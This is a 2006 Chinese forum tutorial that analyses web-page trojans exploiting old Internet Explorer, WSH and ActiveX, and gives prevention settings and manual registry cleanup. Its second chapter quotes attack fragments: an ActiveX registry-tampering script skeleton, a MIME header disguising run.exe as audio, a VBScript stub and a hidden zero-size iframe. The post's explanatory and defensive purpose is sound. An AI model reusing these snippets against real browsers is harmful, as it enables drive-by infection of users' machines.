史萊姆論壇

返回   史萊姆論壇 > 教學文件資料庫 > Hacker/Cracker 及加解密技術文件
忘記密碼?
論壇說明 標記討論區已讀

歡迎您來到『史萊姆論壇』 ^___^

您目前正以訪客的身份瀏覽本論壇,訪客所擁有的權限將受到限制,您可以瀏覽本論壇大部份的版區與文章,但您將無法參與任何討論或是使用私人訊息與其他會員交流。若您希望擁有完整的使用權限,請註冊成為我們的一份子,註冊的程序十分簡單、快速,而且最重要的是--註冊是完全免費的!

請點擊這裡:『註冊成為我們的一份子!』

Google 提供的廣告


 
 
主題工具 顯示模式
舊 2006-04-05, 10:30 PM   #1
psac
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設 教學 - 網頁木馬深度分析以及手動式清除

網頁木馬深度分析以及手動式清除

前 言

  殺毒軟體風靡全球的今天,各式各樣的病毒仍然在網路上橫行,其形式的多樣化,自身之隱蔽性都大大的提高。其中,網頁病毒、網頁木馬就是這個新型病毒大軍中危害面最廣泛,傳播效果最佳的。之所以會出此篇,也是在考慮到太多的人都在網頁病毒中「應聲倒下」,卻不知自己是如何中毒,以及中毒後如何去處理。就此問題,我們開始以下,對網頁病毒、網頁木馬這一「新概念」做個詳細的分析。

  注:為什麼會用這麼大的篇幅去介紹網頁病毒、網頁木馬的常識和執行機理,而非機械地去介紹如何如何做,大家在通讀全文後便有個新的瞭解。

  第一章 惡意網頁的基本常識

  第一節 什麼是網頁病毒

  網頁病毒是利用網頁來進行破壞的病毒,它存在於網頁之中,其實是使用一些script語言編寫的一些惡意程式碼利用IE的漏洞來實現病毒植入。當用戶登入某些含有網頁病毒的網站時,網頁病毒便被悄悄啟動,這些病毒一旦啟動,可以利用系統的一些資源進行破壞。輕則修改用戶的註冊表,使用戶的首頁、瀏覽器標題改變,重則可以關閉系統的很多功能,裝上木馬,染上病毒,使用戶無法正常使用電腦系統,嚴重者則可以將用戶的系統進行格式化。而這種網頁病毒容易編寫和修改,使用戶防不勝防。

天極軟體專題專區精選
Windows Vista專區 POPO專區 QQ專區 QQ掛機 註冊表專區 Windows最佳化
Flash MX 視瀕教學 Photoshop視瀕教學 網頁設計視瀕教學 照片處理數位暗房
PPT動畫演示教學 Excel動畫教學集 Word動畫演示教學 Google專區
特洛伊木馬專區 黑客知識教學專區 防火牆套用專區 瞭解Web2.0
Windows API開發專區 網路編程專區 VB資料庫編程專區 圖像處理與多媒體編程

  目前的網頁病毒都是利用JS.ActiveX、WSH共同合作來實現對客戶端電腦,進行本機的寫操作,如改寫你的註冊表,在你的本機電腦硬碟上增加、移除、更改資料夾或文件等操作。而這一功能卻恰恰使網頁病毒、網頁木馬有了可乘之機。

  而在我們分析網頁病毒前,先叫我們知道促使病毒形成的罪魁禍首:Windows 指令碼宿主 和Microsoft Internet Explorer漏洞利用

  第二節 Windows 指令碼宿主,Internet Explorer漏洞以及相關

  WSH,是「Windows scripting Host」的縮略形式,其通用的中文譯名為「Windows 指令碼宿主」。對於這個較為抽像的名詞,我們可以先作這樣一個籠統的理解:它是內嵌於 Windows 作業系統中的指令碼語言工作環境。

  Windows scripting Host 這個概念最早出現於 Windows 98 作業系統。大家一定還記得 MS-Dos 下的批次處理指令,它曾有效地簡化了我們的工作、帶給我們方便,這一點就有點類似於如今大行其道的指令碼語言。但就算我們把批次處理指令看成是一種指令碼語言,那它也是 98 版之前的 Windows 作業系統所唯一支持的「指令碼語言」。而此後隨著各種真正的指令碼語言不斷出現,批次處理指令顯然就很是力不從心了。面臨這一危機,微軟在研發 Windows 98 時,為了實現多類指令碼文件在 Windows 介面或 Dos 命令提示字元下的直接執行,就在系統內植入了一個關於 32 位 Windows 平台、並獨立於語言的指令碼執行環境,並將其命名為「Windows scripting Host」。WSH 架構於 ActiveX 之上,通過充當 ActiveX 的指令碼引擎控制器,WSH 為 Windows 用戶充分利用威力強大的指令碼指令語言掃清了障礙。

  WSH也有它的不足之處,任何事物都有兩面性,WSH 也不例外。應該說,WSH 的優點在於它使我們可以充分利用指令碼來實現電腦工作的自動化;但不可否認,也正是它的這一特點,使我們的系統又有了新的安全隱患。許多電腦病毒製造者正在熱衷於用指令碼語言來編製病毒,並利用 WSH 的支持功能,讓這些隱藏著病毒的指令碼在網路中廣為傳播。借助WSH的這一缺陷,通過JAVAscript,VBscript,ACTIVEX等網頁尾本語言,就形成了現在的「網頁危機」。

  促使這一問題發生的還有問題多多Internet Explorer 的自身漏洞。比如:「錯誤的MIME簍ultipurpose Internet Mail Extentions,多用途的網際郵件擴充傳輸協定頭」,「Microsoft Internet Explorer瀏覽器彈出視窗Object檔案類型驗證漏洞」。而以下介紹的幾個元件存在的問題或漏洞或是在安全問題上的過濾不嚴密問題,卻又造成了「網頁危機」的另外一個重要因素。

  l Java語言可以編寫兩種檔案類型的程序:應用程式(Application)和小應用程式(Applet)。應用程式是可以獨立執行的程序,而Applet不能獨立執行,需要嵌入HTML文件,遵循一套約定,在支持Java的瀏覽器(如:Netscape Navigator 2.02版本以上,HotJava,Microsoft Internet Explorer 3.0版本以上)執行,是Java一個重要的套用分支,也是當時Java最令人感興趣的地方(它一改網頁呆板的介面),就是在WWW網頁(Home Page / Pages)設計中加入動畫、影像、音樂等,而要達到這些效果使用最多的是Java Applet和Java script (這是一種Java的指令語言)。

  l Javascript是一種關於對像(Object)和事件驅動(Event Driven)並具有安全效能的指令碼語言。使用它的目的是與HTML超文本標記語言、與Web客戶交互作用。從而可以開發客戶端的應用程式等。它是通過嵌入或文件引用在標準的HTML語言中實現的。它的出現彌補了HTML語言的缺陷,它是Java與HTML折衷的選項,具有關於對像、簡單、安全、動態、跨平台性等特性。

  l ActiveX是Microsoft提出的一組使用COM(Component Object Model,設備對像模型)使得軟體設備在網路環境中進行交互的技術。它與具體的編程語言無關。作為針對Internet套用開發的技術,ActiveX被廣泛套用於WEB伺服器以及客戶端的各個方面。同時,ActiveX技術也被用於方便地新增普通的桌面應用程式。在Applet中可以使用ActiveX技術,如直接嵌入ActiveX控制,或者以ActiveX技術為橋樑,將其它開發商提供的多種語言的程序對像整合到Java中。與Java的字元碼技術相比,ActiveX提供了「程式碼簽名」(Code Signing)技術保證其安全性。

  第三節 網頁病毒的攻擊方式

  既然是網頁病毒,那麼很簡單的說,它就是一個網頁,甚至於製作者會使這個特殊網頁與其他一般的網頁別無他樣,但在這個網頁執行與本機時,它所執行的操作就不僅僅是下載後再讀出,伴隨著前者的操作背後,還有這病毒原體軟體的下載,或是木馬的下載,然後執行,悄悄地修改你的註冊表,等等…那麼,這類網頁都有什麼特徵呢?

  § 1.美麗的網頁名稱,以及利用瀏覽者的無知.

  不得不承認,很多惡意網頁或是站點的製作者,他們對瀏覽者的心理分析是下功夫的,對域名的選項和利用絕對是很直接的。很多上網的男性線人大都對MM照片感興趣,這就是他們利用的一個渠道。如你看到了一個域名:www.lovemm.com,或是http://plmm.yeah.net等等. 你會動心去看麼。如果不會,再看這個域名:/Article/UploadFiles/200603/20060301160330179.gif 這個位址你會去看麼?很顯然,咋一看,圖片!一張可能是MM的圖片,又有懂點安全知識的人說了,放心它不可能是BMP圖片木馬,你用這個位址開啟一定是張.GIF格式的圖片。好,你可以去嘗試一下。再看另外一個域名,很顯然是經過構造的。/Article/UploadFiles/200603/20060301160331961.gif 你還能「火眼金睛」嗎?不知道結果是什麼,那你就放心的去點擊它看看。

  § 2.利用瀏覽者的好奇心

  在這裡我要說一句,這樣的人中毒也是自找。對什麼都要好奇這可不是個好習慣。有些東西不是你想看就可以去看的。[作者注]有這個習慣的都改改.^_^!

  § 3.無意識的瀏覽者

  這類人,對他們的同情,我們表示遭遇。^_^!

  在我們基本瞭解了網頁病毒、網頁木馬的執行機體環境後,讓我們開始重點分析一下網頁病毒是如何對我們的電腦進行攻擊,並染毒,並自我保護的。

第二章 網頁病毒、網頁木馬機理深度分析

  第一節 網頁病毒、網頁木馬的製作方式

  Ⅰ.Javascript.Exception.Exploit

  利用JS+WSH的完美結合,來製作惡意網頁的方法幾乎是所有惡意站點必有的「功能」。

  Ⅱ. 錯誤的MIME Multipurpose Internet Mail Extentions,多用途的網際郵件擴充傳輸協定頭.

  幾乎是現在網頁木馬流行利用的基本趨勢,這個漏洞在IE5.0到IE6.0版本中都有,對這麼一個全能的漏洞,大家怎能不重視?

  Ⅲ..EXE to .BMP + Javascritp.Exception.Exploit

  具體的.EXE轉化到.BMP的文章我想大家都見到過,而且不只一次。套用方法很簡單:誘騙瀏覽者上當。

  Ⅳ. iframe 漏洞的利用

  當微軟的IE視窗開啟另一個視窗時,如果子視窗是另一個域或安全區的話,安全檢查應當阻止父視窗訪問子視窗。但事實並非如此,父視窗可以訪問子視窗我的文件的frame,這可能導致父視窗無論是域或安全區都能在子視窗中設定Frame或iframe的URL。這會帶來嚴重的安全問題,通過設定URL指向javascript傳輸協定,父視窗能在子域環境下執行指令碼程式碼,包括任意的惡意程式碼。攻擊者也能在「我的電腦」區域中執行指令碼程式碼。這更會造成嚴重的後果。

  Ⅴ.通過安全認證的CAB,COX

  此類方法就是在.CAB檔案上做手腳,使證書.SPC和密鑰.PVK合法

  原理:IE讀文件時會有文件讀不出,就會去「昇級」這樣它會在網頁中指定的位置找 .cab 並在系統裡寫入個CID讀入.cab裡的文件。

  方法:.cab是WINDOWS裡的壓縮檔案,我們知道IE裡所用的安全文件是用簽名的CAB也不例外,所做的CAB是經過安全使用證書引入的。也就是說IE認證攻擊,只所以每次都能入侵我的腦,是因為它通過的是IE認證下的安全攻擊,這樣不管我怎麼做都沒辦法。

  Ⅵ.EXE文件的元件服務

  現在的網頁木馬元件服務機幾乎是開始氾濫了,多的數不勝數。再將產生的MHT文件進行加密,好,這樣一來,連我們最信任的殺毒軟體也無效了。

  第二節 網頁病毒、網頁木馬的執行機理分析

  Ⅰ.Javascript.Exception.Exploit

  精華語句:

  Function destroy(){

  try

  {

  //ActiveX initialization 啟始化ActiveX,為修改註冊表做準備

  a1=document.applets[0];

  //獲取applet執行對象,以下語句指向註冊表中有關IE的表項

  a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");

  a1.createInstance();

  Shl = a1.GetObject();

  a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");

  a1.createInstance();

  FSO = a1.GetObject();

  a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");

  a1.createInstance();

  Net = a1.GetObject();

  try

  {

  開始做壞事

  }

  }

  catch(e)

  {}

  }

  catch(e)

  {}

  }

  function do()

  {

  //啟始化函數,並每隔一秒執行修改程序

  setTimeout("destroy()", 1000); //設定執行時間1秒

  }

  Do() //壞事執行函數指令

  全部是JS編寫,沒有什麼高深的技術,但它卻可以把你的電腦註冊表改的是亂78糟,在你的電腦裡留下各式各樣的LJ,甚至於連聲招呼都不打就G了你的硬碟。所列出的整段函數看起來簡單明瞭,宣告函數,啟始化環境,取得註冊對象,執行讀,寫,刪權限,定義操作時間(快得叫你連反映都沒有)。

Ⅱ. 錯誤的MIME Multipurpose Internet Mail Extentions,多用途的網際郵件擴充傳輸協定頭.

  精華語句:

  Content-Type: multipart/related;

  type="multipart/alternative";

  boundary="====B===="

  --====B====

  Content-Type: multipart/alternative;

  boundary="====A===="

  --====A====

  Content-Type: text/html;

  Content-Transfer-Encoding: quoted-printable

  --====A====--

  --====B====

  Content-Type: audio/x-wav;

  name="run.exe"

  Content-Transfer-Encoding: base64

  Content-ID: ---以下省略AAAAA N+1個---

  把run.exe的檔案類型定義為audio/x-wav,這下清楚了,這是利用客戶端支持的 MIME(多部

  分網際郵件增強,Multipart Internet Mail Extension) 檔案類型的漏洞來完成的。當申明郵件

  的檔案類型為audio/x-wav時,IE存在的一個漏洞會將附件認為是音瀕文件自動嘗試開啟,,結果導致郵件文件x.eml中的附件run.exe被執行。在win2000上,即使是用滑鼠點擊下載下來的 x.eml,或是拷貝貼上,都會導致x.eml中的附件被執行。整個程序的執行還是依靠x.eml這個文件來支持。Content-Transfer-Encoding: base64 Content-ID: 從這我們可以看出,由於定義後字串格式為base64,那麼一下的程式碼全部為加密過的程式碼,裡面可以是任何執行的指令:

  〈script language=vbs〉

  On Error Resume Next· 容錯語句,避免程序崩潰

  set aa=CreateObject("Wscript.Shell")·建立Wscript對像

  Set fs = CreateObject("scripting.FileSystemObject")·建立文件系統對像

  Set dir1 = fs.GetSpecialFolder(0)·得到Windows路徑

  Set dir2 = fs.GetSpecialFolder(1)·得到System路徑

  ……省略……

  下面程式碼該做什麼各位都該清楚吧.這就是為什麼很多人中毒後不能準確的清除全部的病毒體的原因,也是很多殺毒軟體的一個通病。病毒監控只殺當時查到的,新增的卻置之不理。

  Ⅲ. iframe 漏洞的利用

  一

  多方便的辦法,瀏覽者的COOKIES就這樣輕鬆的被取走。

  二

  〈iframe src=run.eml width=0 height=0〉〈/iframe〉

  一般的木馬運用格式,高度和寬度為0的一個框架網頁,我想你根本看不到它。除非你的瀏覽器不支持框架!

  三

  又是一個框架引用的新方式,對type="text/x-scriptlet" 的調整後,就可以實現和eml格式文件同樣的效果,更是防不勝防。

  Ⅳ. Microsoft Internet Explorer瀏覽器彈出視窗Object檔案類型驗證漏洞 漏洞的利用

  精華程式碼:

  ----- code cut start for run.asp -----

  ----- code cut end for run.asp -----

  [作者注] 我想,這個方法是現行的大部分木馬網頁中使用的頻率最高的一個。效果絕對是最好的。不管是你IE5.0還是IE6.0還是+SP1修正檔的。我們都敢大聲的說:IE6.0+SP1也不是萬能的。哈哈,是不是想改用mozilla了?

  總結:

  幾乎所有檔案類型的網頁病毒都有一個特性,就是再生,如何再生,讓我們從註冊表中的啟動項開始分析:註冊表中管理啟動的主鍵鍵值分別為:

  [HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/RunServices]

  [HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/RunServicesOnce]

  [HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Run]

  [HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/RunOnce]

  [HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Run]

  [HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/RunOnce]

  [HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/RunServices]

  驗證主鍵下沒有載入任何分鍵值.另外,在啟動組態器裡的autoexec.bat ,win.ini,system.ini以及在WIN 9X下的winstart.ini文件,其中的存在LOAD=鍵的,它的值是空,不是空格,只有=號。Autoexec.bat沒有載入任何程序,在「開始」表單/程序/啟動 資料夾下不存在任何程序,那樣才能有效的去掉一個病毒的再生功能。不叫它開機執行,或者不在執行,那我們就可以把它從電腦上請出去。

  第三節 網頁病毒、網頁木馬的執行效果分析

  第一、電腦中的預設值主頁會被無故更改,並且IE工作列內的修改功能被遮閉掉;

  第二、在電腦桌面上無故出現陌生網站的連接,無論怎麼移除,每次開機都依舊會出現,如果按下滑鼠右鍵,出現的工作列中有也會有大量陌生網站的連接;

  第三、開機後,無法進入DOS真實模式; 僅對WIN 9X 系統

  第四、電腦桌面及桌面上的圖示被隱藏;

  第五、註冊表編輯器被告知「已鎖定」,從而無法修改註冊表;

  第六、上網之前,系統一切正常,下網之後系統就會出現異常情況,如系統碟丟失掉、硬碟遭到格式化等,查殺病毒後仍無濟於事;

  第七、上陌生網站後,出現提示項「您已經被XX病毒攻擊」,之後系統出現異常;

  第八、登入站點後,發現一個視窗迅速開啟後又消失,自己的電腦系統檔案夾內多了幾個未知的好像是系統檔案的新文件。

  第九、發現系統的工作中多了幾個未知工作,而且殺不掉,重新啟動後又會出現。

  第十、自己的電腦CPU利用率一直是高居100%,好像是在執行什麼佔用記憶體的東西。

  第十一、登入某站點後,殺毒監控軟體報警,並移除病毒文件,位置在IE的緩衝區。重新啟動電腦後發現自己的IE被改掉了。而且發現第八,第九,第十中的現象。

  第十二、發現中毒後,反覆殺毒,病毒反覆復發,根本沒辦法清理乾淨。尤其是IE的預設值頁。殺毒後修復完畢,但重新啟動後又出現問題。

  第十三、會不定時的彈出廣告。

  第十四、自己的私有帳號無故丟失掉。
__________________
http://bbsimg.qianlong.com/upload/01/08/29/68/1082968_1136014649812.gif
psac 目前離線  
送花文章: 3, 收花文章: 1630 篇, 收花: 3204 次
舊 2006-04-05, 10:31 PM   #2 (permalink)
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設

第三章 網頁病毒、網頁木馬的基本預防手段

  l 要避免被網頁惡意程式碼感染,首先關鍵是不要輕易去一些自己並不十分知曉的站點,尤其是一些看上去非常美麗誘人的網址更不要輕易進入,否則往往不經易間就會誤入網頁程式碼的圈套。

  l 由於該類網頁是含有有害程式碼的ActiveX網頁文件,因此在IE設定中將ActiveX插件和控件、Java指令碼等全部禁止就可以避免中招。

  具體方法是:在IE視窗中點擊"工具→Internet選項,在彈出的對話視窗中選項"安全"標籤,再點擊"自訂等級"按鈕,就會彈出"安全性設定"對話視窗,把其中所有ActiveX插件和控件以及Java相關全部選項"禁用"即可。不過,這樣做在以後的網頁瀏覽程序中可能會造成一些正常使用ActiveX的網站無法瀏覽。

  l 對於Windows98用戶,請開啟 C:/WINDOWS/JAVA/Packages/CVLV1NBB.ZIP, 把其中的「ActiveXComponent.class」刪掉;對於WindowsMe用戶,請開啟C:/WINDOWS/JAVA/Packages/5NZVFPF1.ZIP, 把其中的"ActiveXComponent.class"刪掉。請放心,移除這個元件不會影響到你正常瀏覽網頁的.

  l 對Win2000用戶,還可以通過在Win2000下把服務裡面的遠端註冊表操作服務"Remote Registry Service"禁用,來對付該類網頁。具體方法是:點擊"系統管理工具→服務→Remote Registry Service(允許遠端註冊表操作)",將這一項禁用即可。

  l 昇級你的IE為6.0版本並裝上所有的SP以及追加的幾個小修正檔,可以有效防範上面這些症狀。

  l 下載微軟最新的Microsoft Windows script 5.6

  l 安裝病毒防火牆,一般的殺毒軟體都原有的.開啟網頁監控和指令碼監控.

  l 雖然經過上述的工作修改回了標題和預設值連接首頁,但如果以後某一天又一不小心進入這類網站就又得要麻煩了。這時你可以在IE瀏覽器中做一些設定以使之永遠不能進入這類站點:

  開啟IE內容,點擊「工具」→ 「Internet選項 」→「安全」→「受限站點」,一定要將「安全等級」定為「高」,再點擊「站點」,在「將Web站點增加到區域中」增加自己不想去的網站網址,再點擊「增加」,然後點擊「套用」和「確定」即可正常瀏覽網頁了。

  l 在註冊表

  [HKEY-LOCAL-MACHINE/SOFTWARE/Microsoft/Internet Explorer/ActiveX Compatiblity]下為

  [Active Setup controls]新增一個關於CLSID的新增{6E449683-C509-11CF-AAFA-00AA00 B6015C}在新增下新增REGDWORD檔案類型的值:[Compatibility Flags 0x00000400]

  可以間接的防止網頁木馬問題。

  l 請經常昇級你的殺毒軟體病毒庫,讓他們能及時的查出藏在你電腦內的病毒殘體。經常性的做全機的掃瞄檢查。

  l 推薦安裝:IE6.0.2800.1106 + SP1 + 4個IE專項修正檔

  第四章 網頁病毒、網頁木馬的清理和手動式清理

  第一節 網頁病毒、網頁木馬的一般清理

  在病毒防治和查殺的第一選項,我們首當其衝的就是殺毒軟體。不定期的昇級你的病毒庫,關注你所用的作業系統和瀏覽器的漏洞訊息以及相關修正檔的安裝。當你進入一個惡意站點後註冊表被改時,首先要做的不是盲目的去找殺毒工具,而是驗證一下你自己所中的毒是否只是簡單的修改註冊表,如果是木馬的話,你還在網路上飛來飛去,想想能不丟東西麼?這就是為什麼在文章的開頭部分我們花了一部分篇幅進行惡意網頁機理的介紹和說明。為的就是叫大家從道理上明白,所謂的惡意網頁是通過什麼樣的途徑,執行了什麼樣的程式碼執行出了什麼樣的效果。當然,你沒必要去理解程式碼的全部含義,至少在檢視一個頁面原碼時發現它,也知道它是做什麼,而不去訪問此頁。再提一點,這樣做並非是讓每人個人都去理解,去記憶。在這裡我們也採用「讓少數人先富起來的」政策。這樣,那些GG才能在MM面前顯示自己的「才能」。開個玩笑,轉入整題,如何一般性的清理病毒?

  1.到「網上助手」去清理. 位址是:http://magic.3721.com

  2.使用殺毒軟體殺毒. 用你自己的殺毒軟體來清除。記得要先昇級。

  3.使用一些專殺工具查殺. 到一些殺毒軟體站點去下載殺毒工具吧。

  4.到本站的專業IE維護,是針對現在幾個流行的網頁病毒,網頁木馬站點修改註冊表鍵值精心製作的.位址是:http://ie.e3i5.net

  [作者注]請在使用網頁IE修復時,最好進行兩次修復,我們的修復器採用的是_Dll插件+Javascript+ActiveX製作的,對系統的鍵值有檢測功能,如果你的註冊表項沒有更改,修復系統會自動結束。

  第二節 網頁病毒、網頁木馬的一般手動式清理

  一般在網路不通或者不能上網的情況,你可能會需要修改回你的註冊表。這時以上的方法可能幫不上你任何的忙,怎麼辦?嘗試我們推薦的辦法,手動式清理。

  1.清除每次開機時自動彈出的網頁

  其實清除每次開機時自動彈出的網頁方法並不難,只要你記住位址欄裡出現的網址,然後開啟註冊表編輯器(方法是在點擊「開始」表單,之後點擊「執行」,在執行項中輸入regedit指令進入註冊表編輯器),分別定位到:

  HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Run和

  HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Runonce下,看看在該子項下是否有一個以這個網址為值的值項,如果有的話,就將其移除,之後重新啟動電腦。這樣在下一次開機的時候就不再會有網頁彈出來了。不過網頁惡意程式碼的編寫者有時也是非常的狡猾,他會在註冊表的不同鍵值中多處設有這個值項,這樣上面提的方法也未必能完全解決問題。遇到這種情況,你可以在註冊表編輯器的選項表單裡選項「編輯」→「搜尋」,在「搜尋」對話視窗內輸入開機時自動開啟的網址,然後點擊「搜尋下一個」,將搜尋到的值項移除。另外,如果你是使用Windows 98的用戶,可在「開始」表單中的「執行」對話視窗內輸入「msconfig」,點擊確定,開啟「系統組態實用程序」並開啟「啟動」選擇項,檢查其中是否有非常可疑的啟動項,如果有的話請將其禁用(在程序前的打上勾),然後重啟機器就可以了。如果你所使用的是Windows NT/2000的用戶,可以把Windows 98下的「系統組態實用程序」複製過來並執行進行搜尋清除。

  2. IE標題欄被修改

  具體說來受到更改的註冊表項目為:

  HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/Main/Window Title

  HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Main/Window Title

  解決辦法:

  1在Windows啟動後,點擊「開始」→「執行」表單項,在「開啟」欄中按鍵輸入regedit,然後按「確定」鍵;

  2展開註冊表到

  HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/Main下,在右半部分視窗中找到串值「Window Title」 ,將該串值移除即可,或將Window Title的鍵值改為「IE瀏覽器」等你喜歡的名字;

  3同理,展開註冊表到

  HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Main

  然後按2中所述方法處理。

  4結束註冊表編輯器,重新啟動電腦,執行IE,你會發現困擾你的問題被解決了!

  3. IE分級審查密碼的清除

  1.開啟「開始」表單,按下「執行」,在執行項中輸入regedit指令(這是開啟註冊表編輯表的指令)。

  2.在註冊表編輯器中有五個主要的鍵值,請您按照下面順序一步一步開啟下面的文件(在所指的資料夾上雙按或按下在資料夾前面的十字串號)。

  3.具體順序是:

  HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion

  /Policies/Ratings

  在您打到Ratings資料夾後會看到在右面的視窗中有key鍵值,直接在這個鍵上點右鍵,之後選移除,然後關閉註冊表編輯器即可。

  下面的這個圖是最後一個資料夾及其右面的提示,只要將上面顯示的key鍵移除也就可以清除IE分級審查的密碼了。如圖:

  4. 篡改IE的預設值頁

  具體說就是以下註冊表項被修改:

  HKEY_LOCAL_MACHINE/Software/Microsoft/Internet Explorer/Main/Default_Page_URL

  「Default_Page_URL」這個子鍵的鍵值即起始頁的預設值頁。

  解決辦法:

  執行註冊表編輯器,然後展開上述子鍵,將「Default_Page_URL」子鍵的鍵值中的那些篡改網站的網址改掉就行了,或者將其設定為IE的預設值。

  5. 修復被鎖定的註冊表

  可以自己動手製作一個解除註冊表鎖定的工具,就是用記事本編輯一個任意名字的.reg文件,比如recover.reg,內容如下:

  表單頂端

  REGEDIT4

  [HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/System]

  "DisableRegistryTools"=dword:00000000

  表單底端

  要特別注意的是:如果你用這個方法製作解除註冊表鎖定的工具,一定要嚴格按照上面的書寫格式進行,不能遺漏更不能修改(其實你只需將上述內容「複製」、「貼上」到你機器記事本中即可);完成上述工作後,點擊記事本的文件表單中的「另存為」項,檔案名可以隨意,但文件副檔名必須為.reg(切記),然後點擊「儲存」。這樣一個註冊表解鎖工具就製作完成了,之後你只須雙按產生的工具圖示,其會提示你是否將這個訊息增加進註冊表,你要點擊「是」,隨後系統提示訊息已成功輸入註冊表,再點擊「確定」即可將註冊表解鎖了。

6. 修改IE瀏覽器預設主頁,並且鎖定設定項,禁止用戶更改

  主要是修改了註冊表中IE設定的下面這些鍵值(DWORD值為1時為不可選):

  HKEY_CURRENT_USER/Software/Policies/Microsoft/Internet Explorer/Control Panel

  "Settings"=dword:1

  HKEY_CURRENT_USER/Software/Policies/Microsoft/Internet Explorer/Control Panel

  "Links"=dword:1

  HKEY_CURRENT_USER/Software/Policies/Microsoft/Internet Explorer/Control Panel

  "SecAddSites"=dword:1

  解決辦法:上面這些DWORD值改為「0」即可恢復功能。

  7. IE的預設值首頁灰色按扭不可選

  這是由於註冊表HKEY_USERS/.DEFAULT/Software/Policies/Microsoft/Internet Explorer/Control Panel

  下的DWORD值「homepage」的鍵值被修改的緣故。原來的鍵值為「0」,被修改後為「1」(即為灰色不可選狀態)。

  解決辦法:將「homepage」的鍵值改為「0」即可。

  8. IE右鍵表單被修改

  受到修改的註冊表項目為:

  HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/MenuExt

  下被新增了網頁的廣告訊息,並由此在IE右鍵表單中出現!

  解決辦法:

  開啟註冊標編輯器,找到

  HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/MenuExt

  移除相關的廣告條文即可,注意不要把下載軟體FlashGet和Netants也移除掉,這兩個可是「正常」的,除非你不想在IE的右鍵表單中見到它們。

  9. IE預設值搜尋引擎被修改

  出現這種現象的原因是以下註冊表被修改:

  HKEY_LOCAL_MACHINE/Software/Microsoft/Internet Explorer/Search/CustomizeSearch

  HKEY_LOCAL_MACHINE/Software/Microsoft/Internet Explorer/Search/SearchAssistant

  解決辦法:

  執行註冊表編輯器,依次展開上述子鍵,將「CustomizeSearch」和「SearchAssistant」的鍵值改為某個搜尋引擎的網址即可

  10. 檢視「源文件」表單被禁用

  惡意網頁修改了註冊表,具體的位置為:

  HKEY_CURRENT_USER/Software/Policies/Microsoft/Internet Explorer

  下建立子鍵「Restrictions」,然後在「Restrictions」下面建立兩個DWORD值:

  「NoViewSource」和「NoBrowserContextMenu」,並為這兩個DWORD值賦值為「1」。

  在註冊表

  HKEY_USERS/.DEFAULT/Software/Policies/Microsoft/Internet Explorer/Restrictions下,將兩個DWORD值:「NoViewSource」和「NoBrowserContextMenu」的鍵值都改為了「1」。 通過上面這些鍵值的修改就達到了在IE中使滑鼠右鍵失效,使「檢視」表單中的「源文件」被禁用的目的。

  解決辦法:

  將以下內容另存為後面名為.reg的註冊表文件,比如說unlock.reg,雙按unlock.reg匯入註冊表,不用重啟電腦,重新執行IE就會發現IE的功能恢復正常了。

  REGEDIT4

  HKEY_CURRENT_USER/Software/Policies/Microsoft/Internet Explorer/Restrictions

  「NoViewSource」=dword:00000000

  "NoBrowserContextMenu"=dword:00000000

  HKEY_USERS/.DEFAULT/Software/Policies/Microsoft/Internet Explorer/Restrictions

  「NoViewSource」=dword:00000000

  「NoBrowserContextMenu」=dword:00000000

  11. 系統啟動時彈出對話視窗

  受到更改的註冊表項目為:

  HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Winlogon

  在其下被建立了字串串「LegalNoticeCaption」和「LegalNoticeText」,其中「LegalNoticeCaption」是提示項的標題,「LegalNoticeText」是提示項的文本內容。由於它們的存在,就使得我們每次登入到Windwos桌面前都出現一個提示視窗,顯示那些網頁的廣告訊息!

  解決辦法:

  開啟註冊表編輯器,找到

  HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Winlogon

  這一個主鍵,然後在右邊視窗中找到「LegalNoticeCaption」和「LegalNoticeText」這兩個字串串,移除這兩個字串串就可以解決在登入時出現提示項的現象了。

  12. IE預設值連接首頁被修改

  受到更改的註冊表項目為:

  HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/Main/Start Page

  HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Main/Start Page

  通過修改「Start Page」的鍵值,來達到修改瀏覽者IE預設值連接首頁的目的,如瀏覽「萬花谷」就會將你的IE預設值連接首頁修改為「http://url.url.com 」,即便是出於給自己的主頁做廣告的目的,也顯得太霸道了一些,這也是這類網頁惹人厭惡的原因。

  解決辦法:

